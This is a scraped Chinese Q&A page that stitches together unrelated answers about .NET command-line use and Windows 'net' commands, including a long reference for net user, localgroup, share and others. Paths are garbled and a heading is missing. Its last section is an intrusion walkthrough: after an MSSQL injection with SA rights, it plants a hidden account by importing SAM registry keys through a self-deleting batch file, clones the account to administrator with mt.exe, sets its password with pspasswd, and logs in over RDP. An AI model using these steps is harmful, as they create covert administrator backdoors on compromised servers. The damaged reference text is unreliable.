dotnet命令_windows net 命令的用法大全

A. 如何在CMD下建一個net命令,說出具體的操作過程.特別是建完如何運行.

B. .net framework 的命令行在哪裡

開始--Microsoft Visual Studio 2008--Visual Studio Tools--Visual Studio 2008 命令提示
（以vs2008為例）

C. C#.net中如何調用doc命令

可以使用Process類來調用
Process myProcess = new Process();
myProcess.StartInfo.FileName = "調用的程序路徑";
myProcess.StartInfo.Arguments = "命令參數";
myProcess.StartInfo.CreateNoWindow = true;
myProcess.Start();

D. 在命令提示符下安裝ASP.NET的命令是什麼

cd \
cd C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319
aspnet_regiis.exe -i
注冊.NET4到IIS

E. Eclipse創建項目c#提示找不到'dotnet'的命令路徑

換vs吧，eclipse是Java開發專用的IDE

F. .net 怎麼和DOS命令聯系的怎麼通過代碼調用Dos命令

public bool cmd(string argm)
{
開始創建文件
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;

try
{
p.Start();
p.StandardInput.WriteLine(argm);
p.StandardInput.WriteLine("exit");
p.StandardOutput.ReadToEnd();
p.Close();
return true;
}
catch
{
return false;
}
}
其中argm是表示執行的cmd命令，比如我要創建一個文件夾，使用方法如下：
bool created = cmd(@"md e:\abc\mydir");

跟這個一個原理

G. 在VS.net的命令窗口如何使用命令切換文件夾

如果你當前盤符不是C盤
輸入c:再回車,如果是c盤就不用這一步,用了也沒關系.
然後輸入:cd c:\winnt\command 再回車.
OK

H. cmd下無法使用NET命令

你使用一下其他的命令看能不能用。像 ipconfig 或者是 netstat 要是不可以的話，你去單擊我的電腦右鍵 -> 屬性。在高級那一欄的下面有個環境變數。把那個切圖我看一下。有可能是那個上面沒有設置進去。你說的那幾個文件本來就是不容易打開的。要是我說的這些個其他命令都是可以用的話。那我也就不清楚了。要是方便的話。你可以嘗試下換個系統把。不要用精簡版本的系統。

I. windows net 命令的用法大全

許多 Windows NT 網路命令以 net 開始。這些 net 命令有一些公共屬性：
通過鍵入 net /? 可查閱所有可用的 net 命令。
通過鍵入 net help 命令可在命令行中獲得 net 命令的語法幫助。例如，要得到 net acco
unts 命令的幫助，請鍵入 net help accounts。
所有 net 命令接受選項 / yes 和 /no（可縮寫為 / y 和 /n ）。/ y 對命令產生的任何交互提示自動回答「是」，/n 回答「否」。例如，net stop server 通常提示確認是否根據伺服器服務結束所有服務，net stop server /y 自動回答「是」並關閉伺服器服務。

Net Accounts

更新用戶帳號資料庫、更改密碼及所有帳號的登錄要求。必須要在更改帳號參數的計算機上運行網路登錄服務。
net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days |
unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
net accounts [/sync] [/domain]
參數
無
鍵入不帶參數的 net accounts，將顯示當前密碼設置、登錄時限及域信息。
/forcelogoff:{minutes | no}
設置當用戶帳號或有效登錄時間過期時，結束用戶和伺服器會話前的等待時間。no 選項禁止強行注銷。該參數的默認設置為 no。指定 /forcelogoff:minutes 之後，Windows NT 在其強制用戶退出網路 minutes 分鍾之前，將給用戶發出警報。如果還有打開的文件，Windows NT 將警告用戶。如果 minutes 小於兩分鍾，Windows NT 警告用戶立即從網路注銷。
/minpwlen:length
設置用戶帳號密碼的最少字元數。允許范圍是 0-14，默認值為 6。
/maxpwage:{days | unlimited}
設置用戶帳號密碼有效的最大天數。unlimited 不設置最大天數。/maxpwage 選項的天數必須大於 /minpwage。允許范圍是 1-49,710 天 (unlimited)。默認值為 90 天。
/minpwage:days
設置用戶必須保持原密碼的最小天數。 0 值不設置最小時間。允許范圍是 0-49,710 天，默認值為 0 天。
/uniquepw:number
要求用戶更改密碼時，必須在經過 number 次後，才能重復使用與之相同的密碼。允許范圍是 0-8。默認值為 5。
/domain
在當前域的主域控制器上執行該操作。否則只在本地計算機執行操作。
該參數僅用於 Windows NT Server 域中的 Windows NT Workstation 計算機，Windows NT Server 計算機默認為在主域控制器執行操作。
/sync
當用於主域控制器時，該命令使域中所有備份域控制器同步；當用於備份域控制器時，該命令僅使該備份域控制器與主域控制器同步。該命令僅適用於 Windows NT Server 域成員的計算機。

Net Computer

從域資料庫中添加或刪除計算機。該命令僅在運行 Windows NT Server 的計算機上可用。
net computer \computername {/add | /del}
參數
\computername
指定要添加到域或從域中刪除的計算機。
/add
將指定計算機添加到域。
/del
將指定計算機從域中刪除。

Net Config

顯示當前運行的可配置服務，或顯示並更改某項服務的設置。
net config [service [options]]
參數
無
鍵入不帶參數的 net config 將顯示可配置服務的列表。
service
通過 net config 命令進行配置的服務（server 或 workstation）。
options
服務的特定選項。完整語法請參閱 net config server 或 net config workstation。

Net Config Server

運行服務時顯示或更改伺服器的服務設置。
net config server [/autodisconnect:time] [/srvcomment:"text "] [/hidden:{yes | n
o}]
參數
無
鍵入不帶參數的 net config server，將顯示伺服器服務的當前配置。
/autodisconnect:time
設置斷開前用戶會話閑置的最大時間值。可以指定 -1，表示永不斷開連接。允許范圍是 -1-65535 分鍾，默認值是 15 分鍾。
/srvcomment:"text "
為伺服器添加註釋，可以通過 net view 命令在屏幕上顯示所加註釋。注釋最多可達 48 個字元，文字要用引號引住。
/hidden:{yes | no}
指定伺服器的計算機名是否出現在伺服器列表中。請注意隱含某個伺服器並不改變該伺服器的許可權。默認為 no。

Net Config Workstation

服務運行時，顯示或更改工作站各項服務的設置。
net config workstation [/charcount:bytes] [/chartime:msec] [/charwait:sec]
參數
無
鍵入不帶參數的 net config workstation 將顯示本地計算機的當前配置。
/charcount:bytes
指定 Windows NT 在將數據發送到通訊設備之前收集的數據量。如果同時設置 /chartime:msec 參數，Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535 位元組，默認值是16 位元組。
/chartime:msec
指定 Windows NT 在將數據發送到通訊設備之前收集數據的時間。如果同時設置 /charcount:bytes 參數，Windows NT 按首先滿足條件的選項運行。允許范圍是 0-65535000 毫秒，默認值是 250 毫秒。
/charwait:sec
設置 Windows NT 等待通訊設備變為可用的時間。允許的范圍是 0-65535 秒，默認值是 3600 秒。

Net Continue

重新激活掛起的服務。
net continue service
參數
service
能夠繼續運行的服務，包括： file server for macintosh（該服務僅限於 Windows NT Server）, ftp publishing service, lpdsvc, net logon, network dde，network dde dsdm，nt lm security support provider，remoteboot（該服務僅限於 Windows NT Server），remote access server, schele，server，simple tcp/ip services 及 workstation 。

Net File

顯示某伺服器上所有打開的共享文件名及鎖定文件數。該命令也可以關閉個別文件並取消文件鎖定。
net file [id [/close]]
參數
無
鍵入不帶參數的 net file 可獲得伺服器上打開文件的列表。
id
文件標識號。
/close
關閉打開的文件並釋放鎖定記錄。請從共享文件的伺服器中鍵入該命令。

Net Group

在 Windows NT Server 域中添加、顯示或更改全局組。該命令僅在 Windows NT Server 域中可用。
net group [groupname [/comment:"text "]] [/domain]
net group groupname {/add [/comment:"text "] | /delete} [/domain]
net group groupname username [ ...] {/add | /delete} [/domain]
參數
無
鍵入不帶參數的 net group 可以顯示伺服器名稱及伺服器的組名稱。
groupname
要添加、擴展或刪除的組。僅提供某個組名便可查看組中的用戶列表。
/comment:"text "
為新建組或現有組添加註釋。注釋最多可以是 48 個字元，並用引號將注釋文字引住。
/domain
在當前域的主域控制器中執行該操作，否則在本地計算機上執行操作。
該參數僅用於作為 Windows NT Server 域成員的 Windows NT Workstation 計算機。Windows NT Server 計算機默認為在主域控制器中操作。
username[ ...]
列表顯示要添加到組或從組中刪除的一個或多個用戶。使用空格分隔多個用戶名稱項。
/add
添加組或在組中添加用戶名。必須使用該命令為添加到組中的用戶建立帳號。
/delete
刪除組或從組中刪除用戶名。

Net Help

提供網路命令列表及幫助主題，或提供指定命令或主題的幫助。可用網路命令列於 N 下面的「命令參考」中「命令」窗口內。
net help [command]
net command {/help | /?}
參數
無
鍵入不帶參數的 net help 顯示能夠獲得幫助的命令列表和幫助主題。
command
需要其幫助的命令，不要將 net 作為 command 的一部分。
/help
提供顯示幫助文本方式選擇。
/?
顯示命令的正確語法。

Net Helpmsg

提供 Windows NT 錯誤信息的幫助。
net helpmsg message#
參數
message#
需要其幫助的 Windows NT 消息的四位代碼。

Net Localgroup

添加、顯示或更改本地組。
net localgroup [groupname [/comment:"text "]] [/domain]
net localgroup groupname {/add [/comment:"text "] | /delete} [/domain]
net localgroup groupname name [ ...] {/add | /delete} [/domain]
參數
無
鍵入不帶參數的 net localgroup 將顯示伺服器名稱和計算機的本地組名稱。
groupname
要添加、擴充或刪除的本地組名稱。只提供 groupname 即可查看用戶列表或本地組中的全局組。
/comment: "text "
為新建或現有組添加註釋。注釋文字的最大長度是 48 個字元，並用引號引住。
/domain
在當前域的主域控制器中執行操作，否則僅在本地計算機上執行操作。
該參數僅應用於 Windows NT Server 域中的 Windows NT Workstation 計算機。Windows NT Server 計算機默認為在主域控制器中操作。
name [ ...]
列出要添加到本地組或從本地組中刪除的一個或多個用戶名或組名，多個用戶名或組名之間以空格分隔。可以是本地用戶、其他域用戶或全局組，但不能是其他本地組。如果是其他域的用戶，要在用戶名前加域名（例如，SALESRALPHR）。
/add
將全局組名或用戶名添加到本地組中。在使用該命令將用戶或全局組添加到本地組之前，必
須為其建立帳號。
/delete
從本地組中刪除組名或用戶名。

Net Name

添加或刪除消息名（有時也稱別名），或顯示計算機接收消息的名稱列表。要使用 net name 命令，計算機中必須運行信使服務。
net name [name [/add | /delete]]
參數
無
鍵入不帶參數的 net name 將列出當前使用的名稱。
name
指定接收消息的名稱。名稱最多為 15 個字元。
/add
將名稱添加到計算機中。 /add 是可選項，鍵入 net name name 與鍵入 net name name /add 相同。
/delete
從計算機中刪除名稱。

Net Pause

暫停正在運行的服務。
net pause service
參數
service
指下列服務： file server for macintosh（僅限於 Windows NT Server）、ftp publishing service、lpdsvc、net logon、network dde、network dde dsdm、nt lm security support provider、remoteboot（僅限於 Windows NT Server）、remote access server、schele、server、simple tcp/ip services 或 workstation 。

Net Print

顯示或控制列印作業及列印隊列。
net print \computername sharename
net print [\computername ] job# [/hold | /release | /delete]
參數
computername
共享列印機隊列的計算機名。
sharename
列印隊列名稱。當包含 computername 與 sharename 時，使用反斜杠 () 將它們分開。
job#
在列印機隊列中分配給列印作業的標識號。有一個或多個列印機隊列的計算機為每個列印作業分配唯一標識號。如果某個作業號用於共享列印機隊列中，則不能指定給其他作業，也不能分配給其他列印機隊列中的作業。
/hold
使用 job# 時，在列印機隊列中使列印作業等待。列印作業停留在列印機隊列中，並且其他列印作業只能等到釋放該作業之後才能進入。
/release
釋放保留的列印作業。
/delete
從列印機隊列中刪除列印作業。

Net Send

向網路的其他用戶、計算機或通信名發送消息。要接收消息必須運行信使服務。
net send {name | * | /domain[:name] | /users} message
參數
name
要接收發送消息的用戶名、計算機名或通信名。如果計算機名包含空字元，則要將其用引號(" ") 引住。
*
將消息發送到組中所有名稱。
/domain[:name]
將消息發送到計算機域中的所有名稱。如果指定 name，則消息將發送到指定域或組中的所有名稱。
/users
將消息發送到與伺服器連接的所有用戶。
message
作為消息發送的文本。

Net Session

列出或斷開本地計算機和與之連接的客戶端的會話。
net session [\computername] [/delete]
參數
無
鍵入不帶參數的 net session 可以顯示所有與本地計算機的會話的信息。
\computername
標識要列出或斷開會話的計算機。
/delete
結束與 \computername 計算機會話並關閉本次會話期間計算機的所有打開文件。如果省略\computername 參數，將取消與本地計算機的所有會話。

Net Share

創建、刪除或顯示共享資源。
net share sharename
net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
net share sharename [/users:number | unlimited] [/remark:"text"]
net share {sharename | drive:path} /delete
參數
無
鍵入不帶參數的 net share 將顯示本地計算機上所有共享資源的信息。
sharename
是共享資源的網路名稱。鍵入帶 sharename 的 net share 命令，只顯示該共享信息。
drive:path
指定共享目錄的絕對路徑。
/users:number
設置可同時訪問共享資源的最大用戶數。
/unlimited
不限制同時訪問共享資源的用戶數。
/remark:"text "
添加關於資源的注釋，注釋文字用引號引住。
/delete
停止共享資源。

Net Start

啟動服務，或顯示已啟動服務的列表。如果服務名是兩個或兩個以上的詞，如 Net Logon 或Computer Browser，則必須用引號 (") 引住。.
net start [service]
參數
無
鍵入不帶參數的 net start 則顯示運行服務的列表。
service
包括下列服務： alerter、client service for netware、clipbook server、computer browser、dhcp client 、directory replicator 、eventlog 、ftp publishing service 、lpdsvc、messenger 、net logon 、network dde 、network dde dsdm 、network monitoring agent 、nt lm security support provider 、ole 、remote access connection manager 、remote access isnsap service 、remote access server 、remote procere call (rpc) locator 、remote procere call (rpc) service 、schele 、server 、simple tcp/ip services 、snmp、spooler 、tcp/ip netbios helper 、ups 及 workstation
。
下列服務僅在 Windows NT Server 下可用：file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service 。

Net Statistics

顯示本地工作站或伺服器服務的統計記錄。
net statistics [workstation | server]
參數
無
鍵入不帶參數的 net statistics 將列出其統計信息可用的運行服務。
workstation
顯示本地工作站服務的統計信息。
server
顯示本地伺服器服務的統計信息。

Net Stop

停止 Windows NT 網路服務。
net stop service
參數
service
包括下列服務： alerter（警報）、client service for netware（Netware 客戶端服務）、clipbook server（剪貼簿伺服器）、computer browser（計算機瀏覽器）、directory replicator（目錄復制器）、ftp publishing service (ftp )（ftp 發行服務）、lpdsvc、messenger（信使）、net logon（網路登錄）、network dde（網路 dde）、network dde dsdm（網路 dde dsdm）、network monitor agent（網路監控代理）、nt lm security support provider（NT LM 安全性支持提供）、ole（對象鏈接與嵌入）、remote access connection manager（遠程訪問連接管理器）、remote access isnsap service（遠程訪問 isnsap 服務）、remote access server（遠程訪問伺服器）、remote procere call (rpc) locator（遠程過程調用定位器）、remote procere call (rpc) service（遠程過程調用服務）、schele（調度）、server（伺服器）、simple tcp/ip services（簡單 TCP/IP 服務）、snmp、spooler（後台列印程序）、tcp/ip netbios helper（TCP/IP NETBIOS 輔助工具）、ups 及 workstation（工作站）。
下列服務僅在 Windows NT Server 中可用： file server for macintosh、gateway service for netware、microsoft dhcp server、print server for macintosh、remoteboot、windows internet name service
使計算機的時鍾與另一台計算機或域的時間同步。不帶 /set 參數使用時，將顯示另一台計算機或域的時間。
net time [\computername | /domain[:name]] [/set]
參數
\computername
要檢查或同步的伺服器名。
/domain[:name]
指定要與其時間同步的域。
/set
使本計算機時鍾與指定計算機或域的時鍾同步。

Net Use

連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。該命令也控制永久網路連接。
net use [devicename | *] [\computernamesharename[volume]] [password | *]] [/user:[domainname]username] [[/delete] | [/persistent:{yes | no}]] net use devicename [/home[password | *]] [/delete:{yes | no}] net use [/persistent:{yes | no}]
參數
無
鍵入不帶參數的 net use 將列出網路連接。
devicename
指定要連接到的資源名稱或要斷開的設備名稱。有兩類設備名：磁碟驅動器（D: 到 Z:）和列印機（LPT1: 到 LPT3）。若鍵入星號而不是指定設備名將分配下一個可用設備名。
\computernamesharename
伺服器及共享資源的名稱。如果計算機名包含空白字元，要用引號 (" ") 將雙反斜線及計算機名引住。計算機名長度可以是 1-15 個字元。
volume
指定伺服器上的 NetWare 卷。要連接到 NetWare 伺服器，必須安裝並運行 NetWare 客戶機服務 (Windows NT Workstation) 或 NetWare 網關服務 (Windows NT Server)。
password
訪問共享資源的密碼。
*
提示鍵入密碼。在密碼提示行中鍵入密碼時，將不顯示該密碼。
/user
指定進行連接的另外一個用戶。
domainname
指定另一個域。例如 net use d: \servershare /user:adminmariel 連接用戶 mariel，如同從 admin 域連接一樣。如果省略域，將使用當前登錄域。
username
指定登錄的用戶名。
/home
將用戶連接到其宿主目錄。
/delete
取消指定網路連接。如果用戶以星號指定連接，則取消所有網路連接。
/persistent
控制永久網路連接的使用。默認為上次使用的設置。無設備的連接不是永久的。
yes
保存建立的所有連接，並在下次登錄時還原。
no
不保存建立的連接和繼發連接，並在下次登錄時還原現有連接。使用 /delete 開關項取消永久連接。

Net User

添加或更改用戶帳號或顯示用戶帳號信息。
net user [username [password | *] [options]] [/domain]
net user username {password | *} /add [options] [/domain]
net user username [/delete] [/domain]
參數
無
鍵入不帶參數的 net user 將查看計算機上的用戶帳號列表。
username
添加、刪除、更改或查看用戶帳號名。用戶帳號名最多可以有 20 個字元。
password
為用戶帳號分配或更改密碼。密碼必須滿足在 net accounts 命令 /minpwlen 選項中設置的最小參數。最多是 14 個字元。
*
提示輸入密碼。在密碼提示行中鍵入密碼時，將不顯示該密碼。
/domain
在計算機主域的主域控制器中執行操作。
該參數僅在 Windows NT Server 域成員的 Windows NT Workstation 計算機上可用。默認情況下，Windows NT Server 計算機在主域控制器中執行操作。
注意：在計算機主域的主域控制器發生該動作。它可能不是登錄域。
/add
將用戶帳號添加到用戶帳號資料庫。
/delete
從用戶帳號資料庫中刪除用戶帳號。
選項如下所示：
/active:{no | yes}
啟用或禁止用戶帳號。如果不激活用戶帳號，用戶就不能訪問計算機上的資源。默認值是 yes （激活）。
/comment:"text"
提供用戶帳號的注釋。該注釋最多可以有 48 個字元，文字用引號引住。
/countrycode:nnn
使用操作系統的國家代碼以便為用戶幫助和錯誤信息文件提供指定語言文件。0 值表示默認國家代碼。
/expires:{date | never}
如果設置 date，將導致用戶帳號過期，never 不對用戶帳號設置時間限制。過期日期根據 /countrycode 值可以是下列格式： mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帳號在指定日期開始時過期。月份可以是數字、全名或三個字母的簡拼。年可以是兩位或四位數，使用逗號或斜線（不要用空格）區分日期的各部分。如果省略 yy ，則使用該日期下一次到來的年份（根據計算機的時鍾）。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之間輸入下列日期項，那它們相同：jan,9 1/9/95
january,9,1995
1/9
/fullname:"name"
指定用戶全名而不是用戶名。用引號將名字引住。
/homedir:path
設置用戶宿主目錄的路徑。該路徑必須存在。
/homedirreq:{yes | no}
設置是否需要宿主目錄。
/passwordchg:{yes | no}
指定用戶是否能改變自己的密碼。默認值是 yes。
/passwordreq:{yes | no}
指定用戶帳號是否需要密碼，默認值是 yes。
/profilepath:[path]
設置用戶登錄配置文件的路徑。該路徑名指向注冊表配置文件。
/scriptpath:path
為用戶登錄腳本設置路徑。Path 不能是絕對路徑；
path 是相對於 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相對路徑：。
/times:{times | all}
指定允許用戶使用計算機的時間。times 值表示為 day[-day][, day[-day]] , time[-time][, time[-time]], 增量限制為一小時。Days 可以是全名或簡寫（M、T、W、Th、F、Sa、Su）。Hours 可以是 12 小時制或 24 小時制。對於 12 小時值，使用 AM、PM 或 A.M、P.M。all 表示用戶總可以登錄。空值表示用戶永遠不能登錄。用逗號分隔日期和時間，分隔時間和日期的單位用分號（例如 M,4AM-5PM; T,1PM-3PM）。指定 /times 時不要使用空格。
/usercomment:"text "
讓管理員添加或更改帳號的「用戶注釋」。用引號引住文字。
/workstations:{computername[,...] | *}
列出最多八個用戶可以登錄到網路的工作站。用逗號分隔列表中的多個項。如果 /workstations 沒有列表，或如果列表是星號「*」，則用戶可以從任何一台計算機登錄。

Net View

顯示域列表、計算機列表或指定計算機的共享資源列表。
net view [\computername | /domain[:domainname]]
net view /network:nw [\computername]
參數
無
鍵入不帶參數的 net view 將顯示當前域的計算機列表。
\computername
指定要查看其共享資源的計算機。
/domain[:domainname]
指定要查看其可用計算機的域。如果省略 domainname ，則顯示網路的所有域。
/network:nw
顯示 NetWare 網路中所有可用的伺服器。如果指定計算機名，則顯示 NetWare 網路中該計算機的可用資源。也可以用此開關指定添加到系統中的其他網路。

J. 'net』不是內部命令或外部命令，也不是可運行的程序或批處理文件

實現無net.exe和net1.exe添加系統用戶
大家都知道在windows下添加用戶可以在CMD下用net命令來實現
格式為:net user username password /add
意思為添加一個用戶名為username密碼為password的用戶
如果要添加進管理員組還可以用如下命令來實現
net localgroup administrators username /add
這樣就把用戶名為username的用戶加進了管理員組

但是如果不用net.exe和net1.exe是不是就無法添加系統用戶了呢？
答案是否定的！

假設我們現在手上有一個SA許可權的MSSQL注入點
3389開放並允許連接登錄
可以通過注入工具執行任意命令
但是管理員把net.exe和net1.exe改名或者直接刪除掉了
當然這樣是可以通過上傳自己的net.exe和net1.exe再執行添加用戶命令
但是為了說明這種方法，我們不採用上傳net.exe和net1.exe的方法來解決！

首先要做的就是本地新建一個用戶
比如在本地添加一個用戶名為hackest的用戶
然後導出如下注冊表內容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存為hackest.reg

再導出注冊表內容：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下與hackest相對應的鍵值
比如是000003F6
就導出：
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存為000003F6.reg

然後再寫一個批處理文件，名為add.bat
add.bat文件內容如下：

regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat

把這三個文件：hackest.reg、000003F6.reg、add.bat傳到目標伺服器上
運行add.bat文件

上傳mt.exe運行mt -chkuser命令
我們會發現已經成功添加了一個用戶名為hackest的用戶
但是它並不屬於任何成員組
所以得把它克隆成管理員
假設管理員用戶為administrator，則命令為：
mt -clone administrator hackest
成功克隆為管理員後是不是就可以登錄3389了呢？
其實現在還不可以的
因為這個用戶的密碼問題還沒有解決

我們可以用PS系列工具中的pspasswd.exe來解決密碼問題
命令格式為：
pspasswd.exe username newpassword
在此例中命令則為：
pspasswd.exe hackest hackest
這樣就把用戶名為hackest的用戶密碼更改為hackest了
現在你可以放心地去連接登錄3389了，呵呵

導航:首頁 > 程序命令 > dotnet命令

dotnet命令

與dotnet命令相關的資料